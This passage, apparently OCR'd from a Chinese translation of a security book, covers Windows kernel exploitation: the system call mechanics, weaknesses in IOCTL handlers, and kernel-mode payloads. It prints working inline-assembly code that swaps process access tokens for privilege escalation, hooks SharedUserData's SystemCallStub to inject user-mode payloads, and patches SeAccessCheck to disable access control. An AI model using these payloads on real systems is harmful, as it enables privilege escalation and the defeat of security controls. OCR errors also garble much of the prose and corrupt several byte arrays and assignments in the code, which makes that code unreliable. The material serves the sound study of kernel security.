而 切换 到 内 核 模式 ， 一 旦 切换 到 内 核 模式 ， 它 将 执行 特权 操作 〈 如 果 有 必要 ， 它 将 首先 检查 调用 
上 下 文 是 否 有 是 够 的 访问 权限 )。 

Ntd11 .G11 实 现 了 Native API 的 用 户 模式 部 分 。 我 们 可 以 用 WinDbg 查 看 来 自 Native API 的 函 
数 的 反 汇 编 ( 取 自 Windows XP SP2): 


kd» u ntdll!NtCreateFile 
ntdll!NtCreateFile: 


7c90Q682 b825000000 mov eax, 0x25 

7c90d8687 ba0003fe7f mov edx, [SharedUserData!SystemCallStub 
(7££e0300) } 

7c90d68c ff12 call dword ptr [edx] 

7c90d68e c22c00 ret Ox2c 


前 面 的 指令 把 0x25 载 入 EAX。 这 是 代表 NtcreateFile 的 数字 标识 符 (numeric identifier). # 
下 来 是 一 个 对 位 于 0x7FFE0300 地 址 的 函数 指针 的 调用 ， 它 位 于 sharedUserpate 内 存 区 域 里 。 
SharedUserDate 有 一 些 非常 有 趣 的 属性 ， 在 讨论 内 核 bug 的 利用 时 ， 我们 会 重新 谈论 它 ， 先 暂时 
把 它 放 到 一 边 。 注 意 ， 在 所 有 Windows 的 版 本 中 ，SharedUserpate 的 地 址 总 是 0x7FFE0300， 它 
被 映射 到 所 有 的 用 户 模式 进程 上 ， 因 此 而 得 名 。 让 我 们 仔细 看 一 下 systemcallStub: 

kd» u poi (SharedUserData! SystemCallStub) 

ntdll!KiFastSystemCall: 


7c90eb8b 8bd4 mov edx,esp 
7c90eb8d Of34 sysenter 
7c90eb8f 90 nop 

7c90eb90 90 nop 

7c90ep91 90 nop 

7c90eb92 90 nop 

7c90eb93 90 nop 


ntdll!KiFastSystemCallRet: 
7c90eb94 c3 ret 


栈 指针 保存 在 EDX 里 ，CPU 执 行 SYSENTER。SYsENTER 是 Intel Pentium II 及 以 上 版 本 处 理 器 里 
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的 指令 ， 可 以 快速 切换 到 内 核 模 式 。 它 等 同 于 AMD 处 理 器 (K73&XUDAJEO 里 的 SYscarL。 在 
SYSENTER 和 SYSsCALL 出 现 之 前 ， 操 作 系 统 通 过 执行 软 中 其 0x2E 切 换 到 内 核 模 式 。 不 管 处 理 器 是 
BRE RIES. Windows 2000 仍 使 用 这 个 机 制 。 

一 旦 SYSENTER 被 执行 ， 控 制 切 换 到 MSR (Model Specific Register) SYSENTER_EIP_MSR 上 所 指 
定 的 值 。MSR 是 操作 系统 使 用 的 配置 寄存 器 。 可 以 通过 RDMSR 和 wRMSR 指 令 分 别 进行 读 /号 。 这 些 
是 特权 指令 , 因此 只 能 从 ring 0 执行 。 在 Windows XP 及 以 上 版 本 上 , SYSENTER_EIP_MSR (0x176) 
被 设 为 指向 KiFastcallEntry 函 数 。 





注解 在 SYSENTER 之 后 切换 到 目标 位 置 只 是 难题 的 一 部 分 。 最 终 定义 环 (ring) (代码 将 在 这 个 
环 中 运行 ) 的 段 描述 符 会 是 怎样 的 呢 ? 答 案 是 ，CPU 把 段 基 址 硬 编 码 成 0， 段 大 小 为 4GB， 
特权 级 为 0。 








KiFastCallEntry ij i kisystemService, 这 是 老 版 本 Windows 处 理 中 断 0x2E 的 函数 。 
KiSystemService 找 贝 EDX 指 向 的 用 户 模式 栈 上 的 参数 ， 从 而 获得 先前 保存 在 EAX〔 系 统 调用 编 
号 ) 里 的 值 ， 执 行 位 于 适当 的 服务 表 (service table) 里 索引 处 的 函数 。 


274.2 攻击 系统 调用 

用 于 接合 用 户 模式 和 内 核 模式 的 系统 调用 机 制 有 很 多 薄弱 之 处 。 操 作 系 统 的 开发 者 必须 确保 
系统 调用 分 派 〈dispatch) 机 制 是 健壮 的 ， 当 然 ， 系 统 调用 本 身 也 要 苛刻 地 确认 参数 。 不 这 样 做 
的 话 ， 很 可 能 会 导致 “蓝屏 ”， 或 出 现 最 糟糕 的 情形 一 一 以 内 核 特权 执行 任意 代码 。 基 于 这 个 原 
因 ， 当 在 SEH (Structured Exception Handler) 里 使 用 的 时 候 ，ntoskrn1 输 出 可 以 用 于 确认 参数 的 
函数 。 

ProbeForRead: 这 个 函数 检查 用 户 模 式 缓冲 区 是 否 真 的 位 于 地 址 空间 里 的 用 户 部 分 ， 且 正 
确 对 齐 了 。 

ProbeForWrite: 这 个 函数 检查 用 户 模式 缓冲 区 是 否 真 的 位 于 地 址 空间 里 的 用 户 模式 部 分 ， 
是 可 写 的 ， 并 正确 对 齐 了 。 

如 果 某 个 系统 调用 在 接受 参数 时 没有 做 任何 验证 ， 这 很 可 能 是 个 缺陷 。 这 恰好 也 是 Mark 
Russinovich 和 Bryce Cogswel 在 1996 年 用 他 们 的 NtCrash 工 具 展 示 自 动 化 时 所 碰 到 的 。 第 一 版 的 
NtCrash 在 NT4.0 的 win32k.sys 里 共 找到 了 13 个 漏洞 。 一 年 后 ，Russinovich 发 布 了 NtCrash 的 第 二 
个 版 本 ， 从 http://www.sysinternals.com/files/ntcrash2.zip 还 可 以 找到 它 。 

NtCrash2 找 到 了 40 多 个 问题 ， 不 过 这 次 是 在 ntoskrn1 里 。 其 中 有 很 多 可 以 加 以 利用 。 此 后 ， 
微软 公司 就 格外 努力 地 增强 系统 调用 的 安全 性 。 虽 然 Windows 内 核 中 可 能 仍 有 一 些 特殊 的 、 可 能 
会 引起 问题 的 边界 情形 问题 存在 , 但 花 大 量 的 时 间 去 审计 系统 调用 的 验证 问题 , 很 可 能 会 劳 而 无 
功 《 但 确实 可 以 学 到 许多 关于 内 核 的 新 知识 )。 

第 三 方 代码 通过 使 用 输出 的 KeadGdSystemServiceTable API 把 自己 的 服务 表 加 到 SSDT 
(System Service Descriptor Table) 里 是 可 能 的 。“ 手 动 ”增加 一 个 新 服务 表 实 际 上 更 简单 一 些 ， 尽 
管 这 比较 少见 。 在 第 三 方 代码 里 ， 钧 住 SSDT 更 常见 一 些 ， 也 就 是 说 ， 在 定制 某 些 系 统 时 ， 为 了 
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获取 控制 权 , 它们 会 替换 KiserviceTable 里 的 函数 指针 。 这 很 可 能 是 许多 安全 解决 方案 、rootkit 
和 DRM 为 了 控制 对 资源 的 访问 ， 但 又 无 法 借助 标准 的 OS 功 能 时 所 采用 的 方法 。 但 是 ， 在 许多 情 
形 下 ， 第 三 方 开发 者 并 没有 采取 任何 防护 措施 ， 从 而 为 攻击 者 创造 了 条 件 ; 为 了 造成 拒绝 服务 和 
可 利用 的 条 件 ， 攻 击 者 可 以 传递 畸形 的 参数 。NtCrash2 又 该 出 马 了 ! 

Kerio 和 Norton Personal Firewall 容易 受到 这 类 漏洞 的 攻击 : http://www.matousec.com/info/ 
advisories/Kerio-Multiple-insufficientargument-validation-of-hooked-SSDT-functions.php; http://www. 
matousec.com/info/advisories/Norton-Multiple-insufficientargument-validation-of-hooked-SSDT-functi 
ons.php. 


27.5 与 设备 驱动 程序 通信 


用 户 模式 与 设备 驱动 程序 交互 的 常见 手段 或 许 是 调用 Win32 API 函 数 DeviceIocontrol。 这 
个 函数 允许 用 户 通过 一 个 可 选择 的 输入 和 输出 缓冲 区 向 驱动 程序 发 送 IOCTL (IO ConTroL 
code)。IOCTL 是 一 个 长 度 为 32 位 的 数值 ， 包 含 了 设备 类 型 、 请 求 的 访问 、 函 数 代码 和 转移 类 型 
等 信息 ， 如 下 所 示 : 


[Common |Device Type|Required Access|Custom|Function Code|Transfer Type] 
31 30€-----316 i5€------- 314 13  12€------- 22 1c€-------- 0 


27.5.1 IOCTL 组 件 


下 面 逐个 讨论 IOCTL 的 组 件 。 

a 设备 可 以 是 微软 定义 的 设备 类 型 (DDK 头 文件 里 列举 的 ) 之 一 ， 或 者 是 定制 的 代码 ， 通 

常 在 0x8000 以 上 (更 确切 地 说 ， 第 16 位 ， 也 就 是 通用 位 ”， 被 置 位 ， 以 显示 定制 的 代码 )。 

为 了 使 1O 管 理 器 允许 IRP 传 递 给 驱动 程序 , 请求 的 访问 位 指定 用 户 模式 应 用 程序 打开 设备 

所 必须 拥有 的 权限 。 许 多 驱动 程序 的 作者 把 这 个 位 设 为 FILE_ANY_ACCESS， 介 许 有 这 个 

驱动 程序 句柄 的 人 发 送 IOCTL 。 通 常 可 以 把 请 求 的 访问 限制 得 更 严 一 些 ， 例 如 

FILE READ ACCESS. 

函数 代码 识别 IOCTL 表 示 的 函数 。 值 得 指出 的 是 ,设备 所 支持 的 IOCTL 不 需要 额外 的 函数 

代码 ， 根 据 DDK 的 说 明 ， 小 于 0x800 的 值 由 微软 保留 ， 尽 管 这 不 是 强制 标准 。 

O 转移 类 型 指定 系统 在 用 户 模式 应 用 程序 和 设备 之 间 怎 样 转移 数据 。 它 必须 设置 成 以 下 常 
量 之 一 。 

O METHOD_BUFFERED: 操作 系统 创建 一 个 与 应 用 程序 缓冲 区 相同 大 小 的 非 分 页 (non-paged) 
系统 缓冲 区 。 对 于 写 操作 ，IO 管 理 器 在 调用 驱动 程序 栈 之 前 ， 把 用 户 数据 复制 到 系统 组 
冲 区 。 对 于 读 操 作 ，1/O 管 理 器 在 驱动 程序 栈 完成 请 求 的 操作 后 ， 把 数据 从 系统 缓冲 区 复 
制 到 应 用 程序 的 缓冲 区 。 

O METHOD IN DIRECTHEMETHOD OUT DIRECT; 操作 系统 在 内 存 里 锁定 应 用 程序 的 缓冲 区 。 
然后 创建 一 个 用 于 识别 锁定 的 内 存 页 的 MDL (Memory Descriptor List)， 并 把 MDL 传 递 给 


口 


D 


Q@ 原 书 可 能 有 误 ， 应 该 是 31 位 。 一 一 译 者 注 
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驱动 程序 栈 。 驱 动 程序 通过 MDL 访 问 锁定 的 页 。 
口 METHOE NEITHER: 操作 系统 把 应 用 程序 缓冲 区 的 虚拟 字符 串 地 址 和 大 小 传递 给 驱动 程序 
栈 。 只 有 在 应 用 程序 的 线程 上 下 文 里 执行 的 驱动 程序 才能 访问 这 个 缓冲 区 。 
与 IJOCTL 处 理 程 序 有 关 的 常见 漏洞 如 下 。 
(1) 使 用 METHOD_NEITHER 时 不 验证 缓冲 区 地 址 。 这 将 直接 导致 任意 改写 输出 缓冲 区 。 
(2) 不 验证 地 址 及 通过 结构 传递 的 数据 (适用 于 所 有 的 转移 类 型 )。 驱 动 程序 的 作者 可 能 会 选 
择 METHOD_BUFFERED 来 节省 对 缓冲 区 地 址 的 验证 。 许 多 缓冲 区 包含 有 保存 用 户 模 式 指 针 的 结构 。 
如 果 从 内 核 模式 访问 它们 ， 一 定 要 对 它们 进行 验证 。 


27.5.2 发现 IOCTL 人 处理 程序 中 的 缺陷 


寻找 IOCTL 处 理 程序 里 的 缺陷 主要 有 3 个 方法 ， 接 下 来 将 依次 讨论 。 

1. 静态 分 析 

通过 使 用 反 汇 编 器 〈 例 如 IDA Pro) 或 调试 器 〈 例 如 WinDbg 或 OllyDbg) 对 驱动 程序 进行 静 
态 分 析 ， 可 以 比较 容易 地 确定 有 效 的 IOCTL。 尽 管 OllyDbg 是 一 个 用 户 模 式 下 的 调试 器 ， 但 它 可 
以 用 修改 过 的 映像 文件 子 系统 加 载 驱动 程序 。 这 个 技巧 的 详细 内 容 参 见 http:/malwareanal- 
ysis.com/CommunityServer/blogs/geffner/archive/2007/02/15/18.aspx. 

OllyDbg 特 别 有 用 的 特征 是 它 搜索 代码 结构 (例如 switch》 的 能 力 。 驱 动 程序 dispatch 函 数 通 
常 被 编码 成 不 基于 IOCTL 的 switch 语 铝 。 

静态 分 析 的 优点 是 可 以 识别 所 有 支持 的 IJOCTL。 当 处 理 程 序 不 做 验证 时 ， 也 可 以 比较 容易 地 
观察 到 : 在 读 写 缓冲 区 时 ， 没 有 对 输入 和 输出 缓冲 区 的 长 度 进行 测试 。 静 态 分 析 的 缺点 是 需要 比 
较 长 的 周期 ， 而 且 要 投入 很 多 精力 。 

2. 反复 试验 

通过 在 peviceIocontrol 之 后 调用 GetLastError， 将 有 可 能 判断 设备 是 否 接收 了 IOCTL， 
或 IOCTL 是 正确 的 但 输入 或 输出 缓冲 区 长 度 不 正确 ， 或 是 否 IOCTL 没 有 被 处 理 。 由 于 设备 类 型 的 
长 度 是 15 位 ， 函 数 代 码 的 长 度 是 10 位 ， 所 以 随意 猜测 IOCTL 的 值 可 能 不 会 成 功 。 更 好 的 方法 是 首 
先进 行 基本 的 静态 分 析 ， 从 而 确定 设备 类 型 。 设 备 类 型 作为 参数 传递 给 TocreateDevice〔 通 常 
会 在 驱动 程序 的 进入 点 函数 里 调用 它 )。 通 过 暴力 破解 函数 代码 和 转移 类 型 来 确定 有 效 的 IOCTL 
就 可 行 了 。 接 下 来 暴力 破解 有 效 的 输入 和 输出 缓冲 区 大 小 ， 试 着 向 驱动 程序 发 送 伪造 的 数据 。 

3. 收集 并 模糊 测试 

这 通常 在 与 设备 通信 的 进程 内 ， 通 过 钧 住 peviceIocontro1 来 执行 。 这 个 进程 包含 了 指向 
设备 的 句柄 ， 用 Sysinternals Process Explorer 工 具 可 以 很 容易 确定 。 这 个 方法 的 好 处 是 ， 你 不 但 可 
以 捕获 有 效 的 IOCTL (这样 的 话 ， 通 过 定义 ， 你 也 可 以 知道 它们 的 转移 类 型 )， 而 且 还 可 以 获悉 
有 效 的 输入 和 输出 缓冲 区 的 大 小 , 以 及 一 些 可 用 于 模糊 测试 的 示例 数据 。 这 个 方法 的 主要 缺点 是 ， 
你 只 能 捕获 应 用 程序 在 你 捕获 期 间 发 出 的 IOCTL。 驱动 程序 里 的 功能 可 以 被 应 用 程序 没有 调用 的 
《很 可 能 从 来 都 不 会 调用 ， 例 如 ， 一 些 用 于 诊断 或 调试 的 功能 被 留 下 了 ， 但 零售 版 本 的 应 用 程序 
不 会 使 用 它们 ) IOCTL 激 活 。 
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提示 “测试 设备 驱动 程序 的 有 效 手 段 或 许 是 结合 已 经 讨论 过 的 方法 ， 在 执行 基本 的 静态 分 析 来 


我 们 在 此 并 没有 讨论 怎样 模糊 测试 收集 到 的 数据 , 因为 这 在 很 大 程度 上 取决 于 驱动 程序 做 什 
么 。 常 见 的 是 从 用 户 模 式 向 内 核 模式 传递 交叉 结构 (across structure)。 这 些 结构 通常 包含 指向 用 
户 模式 的 指针 ， 简 单 的 “位 翻转 ”法 就 可 能 导致 内 核 模式 异常 ， 从 而 导致 bug 检 查 。 另 一 方面 ， 
应 用 程序 可 能 会 对 通过 IOCTL 接口 传递 的 数据 进行 混淆 或 编码 处 理 。 这 样 的 话 ， 为 了 获得 更 好 的 
代码 覆盖 ， 将 需要 更 巧妙 的 模糊 测试 方法 。 


27.6 ”内 核 模式 载荷 
至 此 ， 我 们 已 经 详细 讨论 了 攻击 内 核 的 方法 ， 接 下 来 该 看 看 你 打算 在 ring 0 里 做 些 什么 了 。 





当然 ， 下 面 所 述 的 内 容 只 是 建议 而 已 ， 可 能 并 不 适合 每 一 种 情形 。 此 外 ， 我 们 所 介绍 的 载荷 都 还 
有 改进 的 余地 。 对 其 他 载荷 有 兴趣 的 读者 可 以 下 载 MetaSploit Chttp://www.metasploit.com )。 






可 持续 性 与 可 靠 性 的 重要 性 

想 一 想 用 户 模式 利用 程序 。 为 用 户 模式 编写 可 靠 的 、 健 壮 的 利用 程序 很 重要 ， 但 并 不 是 最 
根本 的 要 取决 于 上 下 文 。 对 客户 端 一 边 的 bug 利 用 程序 来 说 ， 例 如 ， 视 使 用 他 们 的 上 下 文 ， 可 
能 并 不 需要 100% 的 可 靠 性 。 同样， 一 些 服务 器 端的 利用 程序 可 能 也 有 一 定 的 容错 范围 ， 打 个 
比方 说 ， 当 bug 是 工作 池 线 程 里 的 栈 溢出 时 ， 访 问 违例 就 可 以 导致 线程 终止 

现在 ， 考 虑 内 核 模式 利用 程序 。 几 乎 在 所 有 的 情形 下 ， 内 核 利 用 程序 首先 必须 可 以 工作 ， 
为 了 维护 系统 稳定 ， 它 必须 修复 任何 困 它 而 被 破坏 的 栈 或 堆 .。 如 果 不 这 样 做 ， 将 会 导致 bug 检 
查 ， 机 器 可 能 会 立即 重启 。 虽 然 多 许 进行 其 他 的 尝试 ， 但 这 样 胸 不 巧妙 也 不 隐秘 。 





27.6.1 提升 用 户 模 式 进程 

这 个 载荷 的 目标 是 提升 指定 应 用 程序 的 特权 (尽管 目的 进程 ID 是 可 以 配置 的 , 但 这 个 应 用 程 
序 通常 就 是 被 缺陷 所 触发 的 那个 )。 为 了 达成 这 个 目标 ， 我 们 必须 修改 与 进程 相关 联 的 访问 令 牌 。 
访问 令 牌 保 存 着 身份 和 与 进程 相关 联 的 用 户 账号 特权 的 详细 信息 。 它 对 应 着 这 个 进程 的 EPRO- 
CESS 结 构 里 的 Token 字 段 所 指向 的 内 容 。 

提升 这 方面 特权 的 最 简单 的 方法 是 , 使 目标 进程 的 令 牌 指向 较 高 特权 进程 的 访问 令 牌 。 我 们 
将 会 分 别 讨论 这 些 作为 目的 和 源 的 进程 。 对 于 源 进程 来 说 ， 比 较 安 全 的 选择 是 系统 进程 (在 
Windows XP、2003， 在 Vista 上 PID 是 4， 在 Windows 2000 上 是 8)， 它 是 内 核 用 于 计算 CPU 时 间 的 

我 们 必须 采取 如 下 步骤 。 

(1) 找 一 个 有 效 的 EPROCESS 结 构 。EPROCESS 块 保存 在 双向 链表 doubly linked list) 里 ,我 们 
一 旦 找到 有 效 的 列表 条 目 ， 就 可 以 遍历 这 个 列表 ， 从 而 找到 我 们 的 源 和 目的 进程 。 在 链表 里 定位 
有 效 的 EPROCESS 条 目 有 几 个 方法 。 如 果 我 们 知道 我 们 的 代码 在 空闲 进程 的 上 下 文 里 ， 并 且 没 有 
被 执行 ， 那 就 可 以 利用 FS:[0x124] 将 指向 当前 进程 的 BTHREAD 结 构 这 一 情况 ， 而 我 们 可 以 从 
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ETHREAD 获 得 当前 进程 的 EPROCESS 结 构 的 地 址 。 不 过 ， 如 果 我 们 不 能 确定 我 们 的 代码 在 上 下 文 里 
是 否 被 执行 ， 就 只 有 另 想 办 法 了 。 Barnaby Jack 建 议 查 找 ntoskrnl 里 的 PsLookupProcessBy- 
ProcessId 的 地 址 ， 并 把 系统 进程 的 PID 传 给 它 。 在 htip://research.eeye.com/html/Papers/download/ 
StepIntoTheRing.pdf 可 以 找到 Barnaby Jack 的 这 篇 文章 (Remote Windows Kernel Exploitaion, Step 
into the Ring 0). 

在 Windows XP 及 以 后 版 本 上 , 所 对 应 的 方法 是 通过 KaqversionBlock( 一 个 未 文档 化 的 结构 ， 
Opc0de 及 Alex Ionescu 先 后 讨论 过 ， Jü.https://www.rootkit.com/newsread.php?newsid-153 , ) 查找 
PsActiveProcessHead 变 量 (一 个 指向 进程 列表 头 的 指针 )。 

(2) 遍历 链表 ， 把 存储 在 每 个 EPROCESS 块 里 的 PID 与 我 们 的 源 和 目 的 进程 相 比 较 。 把 指向 源 
和 目的 EPROCESS 的 指针 保存 起 来 。 

(3) 如 果 找 到 两 个 PID, 就 把 源 EPROCESS 中 的 Token 指 针 复制 到 目的 进程 ， 返回 结果 表明 成 功 了 。 

(4) 如 果 遍 历 完整 个 链表 (更 确切 地 说 ， 我 们 又 回 到 了 最 初 的 EPROCESS)， 就 失败 。 

看 下 面 这 个 针对 Windows XP SP2 编 写 的 载荷 ， 我 们 用 内 联 汇编 器 将 它 作为 C 函 数 的 形式 实 
现 。 


NTSTATUS SwapAccessToken (DWORD dwDstPid, DWORD dwSrcPid) 
( 
DWORD dwStartingEPROCESS - 0; 
DWORD dwDstEPROCESS - 0; 
DWORD dwSrcEPROCESS = 0; 
DWORD dwRetValue - 0; 
DWORD dwActiveProcessLinksOffset - 0x88; 
DWORD dwTokenOffset = 0xC8; 
DWORD dwDelta = dwTokenOffset - dwActiveProcessLinksOffset; 


asm 


pushad 

mov eax, fs: [0x124] 

mov eax, [eax+0x44] 

add eax, dwActiveProcessLinksOffset 
mov dwStartingEPROCESS, eax 


mov ebx, [eax - 0x4] 
cmp ebx, dwSrcPid 

jne CompareDstPid 

mov dwSrcEPROCESS, eax 


cmp ebx, dwDstPid 
jne AreWeDone 
mov dwDstEPROCESS, eax 
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AreWeDone: 


mov edx, dwDstEPROCESS 

and edx, dwSrcEPROCESS 

test edx, edx 

jne SwapToken 

mov eax, [eax] 

cmp eax, dwStartingEPROCESS 
jne CompareSrcPid 

mov dwRetValue, OxC000000F 
jmp WeAreDone 


SwapToken: 


mov eax, dwSrcEPROCESS 
mov ecx, dwDelta 

add eax, ecx 

mov eax, [eax] 

mov ebx, dwDstEPROCESS 
mov [ebx + ecx], eax 


WeAreDone: 


popad 
} 


return dwRetValue; 

} 

我 们 可 以 用 一 些 方法 改进 这 个 载荷 。 首 先 ， 如 果 这 个 载荷 需要 通过 缓冲 区 提供 《因为 不 建议 
把 它 简单 地 映射 到 用 户 模式 里 的 某 个 地 方 )， 可 能 需要 对 它 进行 优化 ， 以 减 小 它 的 大 小 。 其 次 ， 
如 果 我 们 得 到 的 访问 令 牌 被 破坏 了 (也 可 以 说 ， 当 源 进程 终止 时 ， 它 所 在 的 内 存 区 域 被 释放 了 )， 
就 会 出 问题 。 这 也 是 我 们 建议 使 用 系统 进程 的 原因 所 在 ， 因 为 系统 进程 不 会 退出 。 用 需要 的 身份 
和 特权 创建 一 个 全 新 的 访问 令 牌 也 是 有 可 能 的 ， 但 这 需要 的 努力 比 简单 地 复制 一 个 指针 多 多 了 。 
而 且 ， 这 么 做 还 有 另外 一 个 问题 ，F5ROCESS 结 构 没 有 文档 化 ， 因 此 难免 会 受到 操作 系统 版 本 变 
化 的 影响 。 在 不 同 版 本 的 Windows 里 ， 随 着 字段 的 插入 和 删除 ， 指 向 令 牌 字段 的 偏 移 量 经 常会 发 
生 改 变 。 这 意味 着 根据 Windows 版 本 的 不 同 ， 载 荷 可 能 需要 使 用 不 同 的 偏 移 量 。 这 些 改 进 留 给 你 
作为 练习 了 。 
27.6.2 ”运行 任意 的 用 户 模式 载荷 

本 章 开头 就 说 过 ， 我 们 的 终极 目标 是 在 ring 0 里 执行 代码 。 对 首次 编写 内 核 载荷 利用 程序 的 
作者 来 说 ， 在 内 核 模式 里 执行 的 一 些 简单 操作 例如 读 / 写 文件 、 打 开 套 接 字 等 ) 需要 的 指令 显 
然 要 比 用 户 模式 里 多 不 少 ， 但 对 攻击 者 来 说 ， 控 制 用 户 模式 进程 总 是 以 LocalSystem 运 行 就 足够 
了 。 所 以 ， 对 于 开发 一 般 的 将 在 任意 进程 的 上 下 文 里 执行 用 户 模式 载荷 的 内 核 模式 载荷 来 说 ， 这 
就 够 用 了 。 按 照 这 种 思路 ， 我 们 可 以 攻击 内 核 ， 通 过 漏洞 获得 ring 0， 然 后 把 我 们 的 标准 用 户 模 
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式 载荷 〈 诸 如 绑 定 shell) 落 入 〈drop into) 以 LocalSystem 运 行 的 进程 中 。 这 个 方法 的 另 一 个 好 处 
取决 于 我 们 注入 的 进程 ， 如 果 在 某 个 阶段 我 们 的 代码 导致 它 骨 站 ， 它 将 不 会 导致 机 器 蓝屏 。 

为 了 注入 载荷 ， 我 们 准备 依赖 这 样 的 事实 ， 当 一 个 进程 生成 系统 调用 时 ， 它 会 通过 sharea- 
UserDate!SystemCallStub (之 前 在 本 章 简单 地 讨论 过 它 ) 来 调用 (假设 在 Windows XP 及 以 上 
版 本 中 )。 通 过 修改 这 个 函数 指针 ， 可 以 做 到 在 每 次 生成 系统 调用 时 执行 我 们 的 代码 。 下 面 是 需 
要 采取 的 步骤 。 

(1) 禁用 内 存 写 保护 ， 把 我 们 的 系统 调用 穿 透 (pass-through) 代码 写 到 未 使 用 的 sharea- 
UserData 区 域 。 这 段 代码 首先 将 检查 调用 进程 的 PID， 看 它 是 否 与 我 们 的 目标 匹配 ， 如 果 匹 配 ， 
将 执行 我 们 的 载荷 。 


注解 这 里 有 一 个 明显 的 问题 ， PXGKDAR PARE A BIA, 将 会 发 生 什么 ?将 导 
致 载荷 从 开始 处 再 次 执行 ! 因此 ， 保 证 这 不 会 发 生 是 载荷 的 责任 。 通 过 在 进程 空间 ( 例 
如 PEB ) 的 某 个 地 方 设置 一 个 标记 ， 指 示 执 行 已 经 开始 了 ， TOURED ah TA. 载 
荷 应 当做 的 第 一 件 事 情 就 是 检查 这 个 标记 ， 如 果 它 被 置 位 了 就 返回 ， 并 允许 系统 调用 继 
续 执行 。 如 果 它 还 没有 被 置 位 ， 就 设置 它 并 继续 执行 








一 旦 载荷 执行 结束 或 PID 不 匹配 ， 我 们 将 调用 最 初 的 SystemCallstub 函 数 指针 。 
我 们 从 TEB (Thread Environment Block) 获得 调用 进程 的 PID。 

(2) 禁用 中 断 ， 因 为 我 们 不 想 让 systemcallstupb 补 丁 在 完成 之 前 被 取代 了 。 

(3) 修改 systemcallstup， 指 向 我 们 的 穿 透 代码 。 

(4) 重新 启用 内 存 保护 ， 重 新 启用 中 断 。 

考虑 这 个 载荷 。 为 了 看 得 更 清楚 ， 我 们 再 次 用 内 联 汇编 器 把 它 写 成 C 函 数 来 实现 。 
NTSTATUS SharedUserDataHook(DWORD dwTargetPid) 


{ 
char usermodepayload[] = { 0x90, // NOP 
OxC3 // RET 


] 


char passthrough[] = 
{ 


0x50, // PUSH EAX 

0x64, OxA1, 0x18, 0x00, 0x00, 0x00, // MOV EAX,DWORD PTR FS:[18] 

Ox8B, 0x40, 0x20, // MOV EAX,DWORD PTR DS:[EAX + 20] 
Ox3B, 0x05, OxF4, 0x03, OxFE, Ox7F, // CMP EAX,DWORD PTR DS: [7FFEO3FC] 
0x75, 0x07, // dNZ exit 

OxB8, 0x00, 0x05, OxFE, Ox7F, // MOV EAX,0x"7FFEO0500 

OxFF, OxDO, // CALL EAX 

/* exit: */ 

0x58, // POPAD 


OxFF. 0x25. OxFR. 0x037. OxFR. Ox7F. // TMP DWORD PTR DS-.[7WFPRÜOÓa3FRI 
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DWORD *pdwPassThruAddr - (DWORD *) Ox7FFE0400; 
DWORD *pdwTargetPidAddr - (DWORD *) Ox7FFEO3FC; 
DWORD *pdwNewSystemCallStub - (DWORD *) Ox7FFEO3F8; 
DWORD *pdwOriginalSystemCallStub = (DWORD *) Ox7FFE0300; 
DWORD *pdwUsermodePayloadAddr - (DWORD *) Ox7FFEO0500; 


// Disable write protection 


.asm { 
push eax 
mov eax, cr0 
and eax, not 10000h 
mov cr0O, eax 
pop eax 


memcpy((VOID *)Ox7FFE0400, passthrough, sizeof(passthrough)); 
memcpy((VOID *}0x7FFE0500, usermodepayload, sizeof(usermodepayload)); 


*pdwTargetPidAddr - dwTargetPid; 


// Disable interrupts 


asm { cli ) 


*pdwNewSystemCallStub - *pdwOriginalSystemCallStub; 
*pdwOriginalSystemCallStub - (DWORD) pdwPassThruAddr; 


// Re-enable interrupts 
asm ( sti ) 
// Re-enable memory protection 


asm ( push eax 
mov eax, cro 
or eax, 10000h 
mov cr0, eax 
pop eax 


return STATUS_SUCCESS; 
} 


上 面 的 代码 只 是 执行 了 由 NOP 组 成 的 用 户 模式 载荷 。 此 外 ， 它 是 从 ShareqUserDate 里 面 执 
行 这 个 载荷 的 ， 因 此 ， 在 启用 DEP 的 系统 上 ， 需 要 首先 把 sharedUuserDate 标 记 成 可 执行 。 我 们 
可 以 随心 所 欲 为 穿 透 代码 和 诸如 目的 PID 之 类 的 存储 变量 选择 地 址 。 
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276.3 颠覆 内 核 安全 


这 个 载荷 的 目的 是 演示 为 了 禁用 访问 控制 ， 对 内 核 代 码 所 做 的 细小 改变 。Windows 安 全 的 关 
键 点 归结 为 属于 SRM (Security Reference Monitor) 函数 秘 的 单一 例 程 。 这 个 函数 被 称 为 
SeaccessCheck， 由 ntoskrn1 输 出 。 它 的 目的 是 确定 被 请 求 的 访问 权限 是 否 可 以 授予 被 安全 描 
述 符 和 对 象 属 主 所 保护 的 对 象 。 修补 这 个 函数 ， 使 它 总 是 准予 所 请 求 的 访问 权限 ， 这 就 可 以 有 效 
地 禁用 访问 控制 。 我 们 可 以 用 单字 节 补 丁 实现 这 个 目的 。 看 一 下 seaccesscheck 的 原型 

BOOLEAN 

SeAccessCheck ( 
IN PSECURITY DESCRIPTOR SecurityDescriptor, 
IN PSECURITY_SUBJECT_CONTEXT  SubjectSecurityContext, 
IN BOOLEAN  SubjectContextLocked, 

IN ACCESS MASK DesiredAccess, 

IN ACCESS MASK  PreviouslyGrantedAccess, 

OUT PPRIVILEGE SET  *Privileges OPTIONAL, 

IN PGENERIC MAPPING GenericMapping, 

IN KPROCESSOR MODE AccessMode, 

OUT PACCESS MASK GrantedAccess, 

OUT PNTSTATUS  AccessStatus 

); 


SeAccesscheck 是 一 个 长 而 复杂 的 函数 。 从 开头 开始 反 汇编 ， 最 开始 ， 分 支 的 出 现 基于 


AccessMode 人 参数 的 值 ， 


kd> U SeAccessCheck 
nt !SeAccessCheck: 


80563cc8 8bff mov edi,edi 

80563cca 55 push ebp 

80563ccb 8bec mov ebp,esp 

80563ccd 53 push ebx 

80563cce 33db xor ebx,ebx 

80563cd0 385d24 cmp [ebp+0x24], bl 

80563cd3 0f8440ce0000 je nt!SeAccessCheck+0xd (80570b19) 


AccessMode 参 数 指定 它 是 否 是 内 核 本 身 请 求 访问 对 象 的 权限 , 或 源 自用 户 模式 的 最 终 请 求 。 
因为 一 旦 在 内 核 模 式 里 执行 代码 , 就 没有 安全 性 可 言 了 , 内 核 总 是 授予 所 请 求 的 访问 权限 。 因此， 
我 们 可 以 把 je 指令 改 成 jmp， 从 而 使 不 管 是 用 户 模式 还 是 内 核 模 式 ， 都 执行 “来 自 内 核 ” 的 代码 
路 径 。 

看 下 面 这 个 载荷: 


push eax 


// Disable interrupts so that we won't get preempted half way through 
which may leave the patch incomplete 
cli 
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// Disable the write protect bit in Control Register 0 (CRO) so that we 
can write to kernel code pages 

mov eax, cro 

and eax, not 10000h 

mov cr0, eax 


// Overwrite the je with a nop; jmp 
mov eax, 0x80563cd3 
